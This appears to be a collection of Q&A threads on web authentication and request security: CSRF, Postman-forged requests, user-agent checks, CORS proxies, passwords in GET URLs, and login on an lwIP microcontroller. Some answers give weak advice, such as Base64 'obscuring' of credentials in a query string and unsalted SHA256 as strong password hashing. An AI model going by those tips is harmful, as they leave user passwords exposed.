I would like in Liferay to allow only logged in users to do post requests, and at the same time deny other Post request sources, like from Postman, for example.
With the caveat that I am not familiar with Liferay itself, I can tell you that in a general Web application what you are asking is impossible.
Let's consider the problem in its simplest form:
A Web application makes POST requests to a server
The server should allow requests only from a logged-in user using the Web application
The server is stateless - that is, each request must be considered atomically. There is no persistent connection and no state is preserved at the server.
So - let's consider what happens when the browser makes a POST:
An HTTP connection is opened to the server
The HTTP headers are sent, including any site cookies that have previously been set by the server, and special headers like the User Agent and referrer
The form data is posted to the server
The server processes the request and returns a response
How does the server know that the user is logged in? In most cases, this is done by checking a cookie that is sent with the request and verifying that it is correct - cryptographically signed, for instance.
Now let's consider a Postman request. Exactly what is the difference between a request submitted through Postman and one submitted through the browser? None. There is no difference. It is trivially simple to examine and retrieve the cookies sent on a legitimate request from the browser, and include those headers in a faked Postman request.
Let's consider what you might do to prevent this.
1. Set and verify extra cookies - won't work because we can still retrieve those cookies just like we did with the login session
2. Encrypt the connection so the cookies can't be captured over the wire - won't work because I can capture the cookies from the browser
3. Check the User Agent to ensure that it is sent by a browser - won't work because I can spoof the headers to any value I want
4. Check the Referrer to ensure the request came from a valid page on my site (this is part of a Cross-Site Request Forgery mitigation) - won't work because I can always spoof the Referrer to any value I want
5. Add logic (JavaScript) into the page to compute some validity token - won't work because I can still read the JavaScript (it's client-side) and fake my own token
By the very nature of the Web system, this problem is insoluble. Because you (the server/application writer) do not have complete control over both sides of the communication, it is always possible to spoof requests from the client. The best you can do is prevent arbitrary requests from arbitrary users who do not have valid credentials. However, any request that includes the correct security tokens must be considered valid, whether it is generated from a browser/web page or crafted by hand or through some other application. At best, you will needlessly complicate your application for no significant improvement in security. You can prevent CSRF attacks and some other injection-type attacks, but because you as the client can always read whatever is sent from the server and can always craft your own requests, you can always provide a valid request.
Clarification
Can you please explain exactly what you are trying to accomplish? Are you trying to disable guest access completely, even through "valid" referrers (a user actually submitting a form) or are you trying to prevent post requests coming from other referrers?
If you are just worried about referrer forgeries you can set the following property in your portal-ext.properties file.
auth.token.check.enabled = true
If you want to remove all permissions for the guest role you can simply go into the portal's control panel, go into Configuration and then into the permissions table. Unchecked the entire row associated with guest.
That should do it. If you can't find those permissions post your exact Liferay version.
Related
I have an API in Next.js (NextAuth.js) that only the frontend will be using. It uses cookies for authentication. My question is could a malicious website change the user's data using CSRF? Should I implement CSRF tokens or can I prevent malicious websites from changing the data without it?
If authentication is based on something that the browser sends automatically with requests (like cookies), then yes, you most likely need protection against CSRF.
You can try it yourself: set up a server on one origin (eg. localhost:3000), and an attacker page on another (eg. localhost:8080, it's the same as a different domain, controlled by an attacker). Now log in to your app on :3000, and on your attacker origin make a page that will post to :3000 something that changes data. You will see that while :8080 will not receive the response (because of the same origin policy), :3000 will indeed receive and process the request. It will also receive cookies set for :3000, regardless of where the user is making the request from.
For mitigation, you can implement the synchronizer token pattern (csrf tokens), double submit, or you can decide to rely on the SameSite property of cookies, which are not supported by old browsers, but are supported by fairly recent ones, so there is some risk, depending on who your users are.
If ideologically I oppose to the policies of a certain browser's ​developers (I think that the browser harms the users), can I somehow block that browser from accessing my website?
I would assume that such block would have to be backend, frontend won't help here, but can backend languages such as PHP/Ruby/C++/Python, etc. really help for that sake?
Your server can look at the HTTP_USER_AGENT header in the HTTP request that the client sends to the server. This header typically contains information about the user agent that made the request - i.e. if the request originated from a web browser, then the user agent information will generally contain the vendor and version of the browser. So, your server can respond conditionally based on what the client sends in this header.
See https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/User-Agent for more info, and for examples of user agent strings for a number of widely used browsers.
However, be aware that the HTTP_USER_AGENT header is populated by the client. Therefore, this header cannot be trusted, as it can easily be forged by the client.
I've read an article which used Cors-Anywhere to make an example url request, and it made me think about how easily the Same Origin Policy can be bypassed.
While the browser prevents you from accessing the error directly, and cancels the request altogether when it doesn't pass a preflight request, a simple node server does not need to abide to such rules, and can be used as a proxy.
All there needs to be done is to append 'https://cors-anywhere.herokuapp.com/' to the start of the requested url in the malicious script and Voila, you don't need to pass CORS.
And as sideshowbarker pointed out, it takes a couple of minutes to deploy your own Cors-Anywhere server.
Doesn't it make SOP as a security measure pretty much pointless?
The purpose of the SOP is to segregate data stored in browsers by their origin. If you got a cookie from domain1.tld (or it stored data for you in a browser store), Javascript on domain2.tld will not be able to gain access. This cannot be circumvented by any server-side component, because that component will still not have access in any way. If there was no SOP, a malicious site could just read any data stored by other websites in your browsers.
Now this is also related to CORS, as you somewhat correctly pointed out. Normally, your browser will not receive the response from a javascript request made to a different origin than the page origin it's running on. The purpose of this is that if it worked, you could gain information from sites where the user is logged in. If you send it through Cors-Anywhere though, you will not be able to send the user's session cookie for the other site, because you still don't have access, the request goes to your own server as the proxy.
Where Cors-Anywhere matters is unauthenticated APIs. Some APIs might check the origin header and only respond to their own client domain. In that case, sure, Cors-Anywhere can add or change CORS headers so that you can query it from your own hosted client. But the purpose of SOP is not to prevent this, and even in this case, it would be a lot easier for the API owner to blacklist or throttle your requests, because they are all proxied by your server.
So in short, SOP and CORS are not access control mechanisms in the sense I think you meant. Their purpose is to prevent and/or securely allow cross-origin requests to certain resources, but they are not meant to for example prevent server-side components from making any request, or for example to try and authenticate your client javascript itself (which is not technically possible).
We have webpage which uses the sapui5-framework to build a spa. The communication between the browser and the server uses https. The interaction to log into the page is the following:
The user opens the website by entering https://myserver.com in the browser
A login dialogue with two form fields for unsername and password is shown.
After entering username and password and pressing the login-button
an ajax-request is send using GET to the URL: https://myusername:myPassword#myserver.com/foo/bar/metadata
According to my understanding using GET to send sensitive data is never a good idea. But this answer to HTTPS is the url string secure says the following
HTTPS Establishes an underlying SSL conenction before any HTTP data is
transferred. This ensures that all URL data (with the exception of
hostname, which is used to establish the connection) is carried solely
within this encrypted connection and is protected from
man-in-the-middle attacks in the same way that any HTTPS data is.
An in another answer in the same thread:
These fields [for example form field, query strings] are stripped off
of the URL when creating the routing information in the https packaging
process by the browser and are included in the encrypted data block.
The page data (form, text, and query string) are passed in the
encrypted block after the encryption methods are determined and the
handshake completes.
But it seems that there still might be security concerns using get:
the URL is stored in the logs on the server and in the same thread
leakage through browser history
Is this the case for URLs like?
https://myusername:myPassword#myserver.com/foo/bar/metadata
// or
https://myserver.com/?user=myUsername&pass=MyPasswort
Additional questions on this topic:
Is passsing get variables over ssl secure
Is sending a password in json over https considered secure
How to send securely passwords via GET/POST?
On security.stackexchange are additional informations:
can urls be sniffed when using ssl
ssl with get and post
But in my opinion a few aspects are still not answered
Question
In my opinion the mentioned points are valid objections to not use get. Is the case; is using get for sending passwords a bad idea?
Are these the attack options, are there more?
browser history
server logs (assuming that the url is stored in the logs unencrypted or encrypted)
referer information (if this is really the case)
Which attack options do exist when sending sensitive data (password) over https using get?
Thanks
Sending any kind of sensitive data over GET is dangerous, even if it is HTTPS. These data might end up in log files at the server and will be included in the Referer header in links to or includes from other sides. They will also be saved in the history of the browser so an attacker might try to guess and verify the original contents of the link with an attack against the history.
Apart from that you better ask that kind of questions at security.stackexchange.com.
These two approaches are fundamentally different:
https://myusername:myPassword#myserver.com/foo/bar/metadata
https://myserver.com/?user=myUsername&pass=MyPasswort
myusername:myPassword# is the "User Information" (this form is actually deprecated in the latest URI RFC), whereas ?user=myUsername&pass=MyPasswort is part of the query.
If you look at this example from RFC 3986:
foo://example.com:8042/over/there?name=ferret#nose
\_/ \______________/\_________/ \_________/ \__/
| | | | |
scheme authority path query fragment
| _____________________|__
/ \ / \
urn:example:animal:ferret:nose
myusername:myPassword# is part of the authority. In practice, use HTTP (Basic) authentication headers will generally be used to convey this information. On the server side, headers are generally not logged (and if they are, whether the client entered them into their location bar or via an input dialog would make no difference). In general (although it's implementation dependent), browsers don't store it in the location bar, or at least they remove the password. It appears that Firefox keeps the userinfo in the browser history, while Chrome doesn't (and IE doesn't really support them without workaround)
In contrast, ?user=myUsername&pass=MyPasswort is the query, a much more integral part of the URI, and it is send as the HTTP Request-URI. This will be in the browser's history and the server's logs. This will also be passed in the referrer.
To put it simply, myusername:myPassword# is clearly designed to convey information that is potentially sensitive, and browsers are generally designed to handle this appropriately, whereas browsers can't guess which part of which queries are sensitive and which are not: expect information leakage there.
The referrer information will also generally not leak to third parties, since the Referer header coming from an HTTPS page is normally only sent with other request on HTTPS to the same host. (Of course, if you have used https://myserver.com/?user=myUsername&pass=MyPasswort, this will be in the logs of that same host, but you're not making it much worth since it stays on the same server logs.)
This is specified in the HTTP specification (Section 15.1.3):
Clients SHOULD NOT include a Referer header field in a (non-secure) HTTP request if the referring page was transferred with a secure protocol.
Although it is just a "SHOULD NOT", Internet Explorer, Chrome and Firefox seem to implement it this way. Whether this applies to HTTPS requests from one host to another depends on the browser and its version.
It is now possible to override this behaviour, as described in this question and this draft specification, using a <meta> header, but you wouldn't do that on a sensitive page that uses ?user=myUsername&pass=MyPasswort anyway.
Note that the rest of HTTP specification (Section 15.1.3) is also relevant:
Authors of services which use the HTTP protocol SHOULD NOT use GET based forms for the submission of sensitive data, because this will cause this data to be encoded in the Request-URI. Many existing servers, proxies, and user agents will log the request URI in some place where it might be visible to third parties. Servers can use POST-based form submission instead
Using ?user=myUsername&pass=MyPasswort is exactly like using a GET based form and, while the Referer issue can be contained, the problems regarding logs and history remain.
Let assume that user clicked a button and following request generated by client browser.
https://www.site.com/?username=alice&password=b0b123!
HTTPS
First thing first. HTTPS is not related with this topic. Because using POST or GET does not matter from attacker perspective. Attackers can easily grab sensitive data from query string or directly POST request body when traffic is HTTP. Therefor it does not make any difference.
Server Logs
We know that Apache, Nginx or other services logging every single HTTP request into log file. Which means query string ( ?username=alice&password=b0b123! ) gonna be written into log files. This can be dangerous because of your system administrator can access this data too and grab all user credentials. Also another case could be happen when your application server compromise. I believe you are storing password as hashed. If you use powerful hashing algorithm like SHA256, your client's password will be more secure against hackers. But hackers can access log files directly get passwords as a plain-text with very basic shell scripts.
Referer Information
We assumed that client opened above link. When client browser get html content and try to parse it, it will see image tag. This images can be hosted at out of your domain ( postimage or similar services, or directly a domain that under the hacker's control ) . Browser make a HTTP request in order to get image. But current url is https://www.site.com/?username=alice&password=b0b123! which is going to be referer information!
That means alice and her password will be passed to another domain and can be accessible directly from web logs. This is really important security issue.
This topic reminds me to Session Fixation Vulnerabilities. Please read following OWASP article for almost same security flaw with sessions. ( https://www.owasp.org/index.php/Session_fixation ) It's worth to read it.
The community has provided a broad view on the considerations, the above stands with respect to the question. However, GET requests may, in general, need authentication. As observed above, sending user name/password as part of the URL is never correct, however, that is typically not the way authentication information is usually handled. When a request for a resource is sent to the server, the server generally responds with a 401 and Authentication header in the response, against which the client sends an Authorization header with the authentication information (in the Basic scheme). Now, this second request from client can be a POST or a GET request, nothing prevents that. So, generally, it is not the request type but the mode of communicating the information is in question.
Refer http://en.wikipedia.org/wiki/Basic_access_authentication
Consider this:
https://www.example.com/login
Javascript within login page:
$.getJSON("/login?user=joeblow&pass=securepassword123");
What would the referer be now?
If you're concerned about security, an extra layer could be:
var a = Base64.encode(user.':'.pass);
$.getJSON("/login?a="+a);
Although not encrypted, at least the data is obscured from plain sight.
I wish to use my Stellaris LM3S8962 microcontroller as a bridge between internet and a bunch of sensors. I will be using Zigbee nodes for communication from the sensors to the microcontroller. I have been able to use the lwIP TCP/IP stack (for LM3S8962) to access HTML pages stored in the controller's flash.
Now, I want to add a secure login system for the same. What I basically want is that - when I enter the IP of the controller in the browser, it should prompt me for a username and a password. I want to make this system as secure as possible using the lwIP TCP/IP stack.
FYI, the stack does not support PHP or any other scripts. CGI feature (in C) is supported but I don't know how to implement the security part. Please guide.
There are basically two ways you could implement user authentication over HTTP on your platform:
"classic" Basic HTTP authentication (see RFC2616 for exact specification),
a login form, creating a session ID, and returning that to the browser, to be stored either in a cookie, or in the URL.
Basic HTTP authentication works by you inserting a check into your web page serving routine, to see if there is an Authorization HTTP header. If there is, you should decode it (see the RFC), and check the specified username/password. If the credentials are ok, then proceed with the web page serving. If the credentials are incorrect, or in case there is no Authorization header, you should return a 401 error code. The browser will then prompt the user for the credentials. This solution is rather simple, and you'll get the browser login dialog, not a nice HTML page. Also, the microcontroller will have to check the credentials for every page request.
Authentication via a login form works by your server maintaining a list of properly authenticated user sessions (probably in memory), and checking the request against this list. Upon loggin in, a unique, random ID should be generated for that session, and the session data should be entered into your list. The new session ID should be returned to the browser to be included in upcoming HTTP requests. You may choose the session ID to be put into a browser cookie, or you can embed it into the URL, as a URL parameter (?id=xxxxx). The URL parameter is embedded by sending a 302 Redirection response to the browser with the new URL. If you want the cookie solution, you can send the response to the login request with a Set-Cookie HTTP response header. In the login form solution, the actual credentials (username/password) are only checked once, at login. After that, only the session ID is checked against the list of active sessions. The session ID has to be extracted from the requests for every web page serving (from the URL, or from the Cookie HTTP header). Also, you'll have to implement some kind of session timeout, both as a security measure, and to put bounds to the size of the list of active sessions.
Now comes the harder part: in both solutions, the username/password travels in some requests (in every request for the Basic HTTP authentication, and in the login page POST for the login form solution), and can be extracted from the network traffic. Also, information neccessary to hijack the session is present in every request in both solutions. If this is a problem (the system works on a freely accessible LAN segment, or over network links beyond your control), you'll probably need SSL to hide these sensitive data. How to get a reasonable SSL implementation for your platform, that's another question.